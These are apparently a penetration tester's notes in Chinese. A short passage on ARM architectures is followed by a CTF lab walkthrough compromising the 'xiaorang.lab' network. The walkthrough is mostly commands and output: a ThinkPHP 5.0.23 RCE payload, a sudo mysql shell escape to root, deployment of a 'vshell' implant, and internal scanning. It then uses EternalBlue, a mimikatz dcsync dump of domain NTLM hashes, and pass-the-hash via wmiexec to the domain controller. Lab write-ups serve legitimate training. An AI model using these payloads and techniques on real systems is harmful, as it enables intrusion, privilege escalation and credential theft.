arm 芯片
x86 amd 芯片主要是闭源的
高通/海斯是按照 arm 公司提供的设计方案生产的
ARMv7 是 ARM 公司的第七代指令集架构,主要应用于手机、平板电脑和其他嵌入式系统。ARMv7 支持 32 位和 16 位指令,提供了较丰富的数学运算能力,同时也支持浮点运算。
ARMv8 是 ARM 公司的第八代指令集架构,主要应用于更大型的系统,比如服务器和个人电脑。ARMv8 支持 32 位和 64 位指令,提供了更丰富的数学运算能力,同时也支持浮点运算。
aarch32 aarch64 都是 arm v8
arm 的耗能比较小,适合手机
initial
fscan 扫描
[+] PocScan http://121.89.202.101 poc-yaml-thinkphp5023-method-rce poc1
已完成 1/1
[*] 扫描结束,耗时: 2.5396797s
然后 thinkphpgui
[+] 存在ThinkPHP 5.0.23 RCE
Payload: http://121.89.202.101//?s=captcha&test=-1 Post: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
get shell,用 yijian 连接
sudo -l
发现可以用 mysql,去 gtfobins
(www-data:/) $ sudo mysql -e '\! ls /root/flag'
flag01.txt
(www-data:/) $ sudo mysql -e '\! cat /root/flag/flag01.txt'
██ ██ ██ ██ ███████ ███████ ██ ████ ██ ████████
░░██ ██ ░██ ████ ██░░░░░██ ░██░░░░██ ████ ░██░██ ░██ ██░░░░░░██
░░██ ██ ░██ ██░░██ ██ ░░██░██ ░██ ██░░██ ░██░░██ ░██ ██ ░░
░░███ ░██ ██ ░░██ ░██ ░██░███████ ██ ░░██ ░██ ░░██ ░██░██
██░██ ░██ ██████████░██ ░██░██░░░██ ██████████░██ ░░██░██░██ █████
██ ░░██ ░██░██░░░░░░██░░██ ██ ░██ ░░██ ░██░░░░░░██░██ ░░████░░██ ░░░░██
██ ░░██░██░██ ░██ ░░███████ ░██ ░░██░██ ░██░██ ░░███ ░░████████
░░ ░░ ░░ ░░ ░░ ░░░░░░░ ░░ ░░ ░░ ░░ ░░ ░░░ ░░░░░░░░
Congratulations!!! You found the first flag, the next flag may be in a server in the internal network.
flag01: flag{60b53231-
上个 vshell
(www-data:/var/www/html) $ sudo mysql -e '\! chmod +x ./linux_amd64_giacomo'
(www-data:/var/www/html) $ sudo mysql -e '\! ./linux_amd64_giacomo'
然后 fscan
(www-data:/var/www/html) $ sudo mysql -e '\! ./fscan -h 172.22.1.15/24 -o 1.txt'
(www-data:/var/www/html) $ cat 1.txt
[*] LiveTop 172.22.0.0/16 段存活数量为: 2
[*] LiveTop 172.22.1.0/24 段存活数量为: 1
[*] LiveTop 172.22.255.0/24 段存活数量为: 1
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:8000 open
172.22.1.18:3306 open
172.22.1.15:22 open
172.22.1.2:88 open
172.22.1.18:445 open
172.22.1.21:445 open
172.22.1.18:139 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:135 open
172.22.1.21:135 open
172.22.1.2:135 open
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
信呼协同办公系统
在浏览器 proxy switch omega 配置代理之后就能在浏览器访问网页了.这里在尝试出弱口令 admin/admin123就成功登录了进去 (实则是懒得爆破)
然后找到第二个 flag
C:\Users\Administrator\flag> TYPE flag02.txt
___ ___ ___ ________ ________ ________ ________ ________ ________
|\ \ / /|\ \|\ __ \|\ __ \|\ __ \|\ __ \|\ ___ \|\ ____\
\ \ \/ / | \ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \\ \ \ \ \___|
\ \ / / \ \ \ \ __ \ \ \\\ \ \ _ _\ \ __ \ \ \\ \ \ \ \ ___
/ \/ \ \ \ \ \ \ \ \ \\\ \ \ \\ \\ \ \ \ \ \ \\ \ \ \ \|\ \
/ /\ \ \ \__\ \__\ \__\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\
/__/ /\ __\ \|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|
|__|/ \|__|
flag02: 2ce3-4813-87d4-
Awesome! ! ! You found the second flag, now you can attack the domain controller.
打永恒之蓝
meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ 080dd526a0848b9cd74358fe00409a7e 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ 16f58542d4b9db97f82b0c91d3f8674e 4096
1108 XIAORANG-WIN7$ eb06715a460246f2c10e0b9113b399a9 4096
拿下 admin hash
SMB 172.22.1.2 445 DC01 [+] Executed command via wmiexec
SMB 172.22.1.2 445 DC01 ___ ___
SMB 172.22.1.2 445 DC01 \\ / / / / // | | // ) ) // ) ) // | | /| / / // ) )
SMB 172.22.1.2 445 DC01 \ / / / //__| | // / / //___/ / //__| | //| / / //
SMB 172.22.1.2 445 DC01 / / / / / ___ | // / / / ___ ( / ___ | // | / / // ____
SMB 172.22.1.2 445 DC01 / /\\ / / // | | // / / // | | // | | // | / / // / /
SMB 172.22.1.2 445 DC01 / / \\ __/ /___ // | | ((___/ / // | | // | | // |/ / ((____/ /
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01 flag03: e8f88d0d43d6}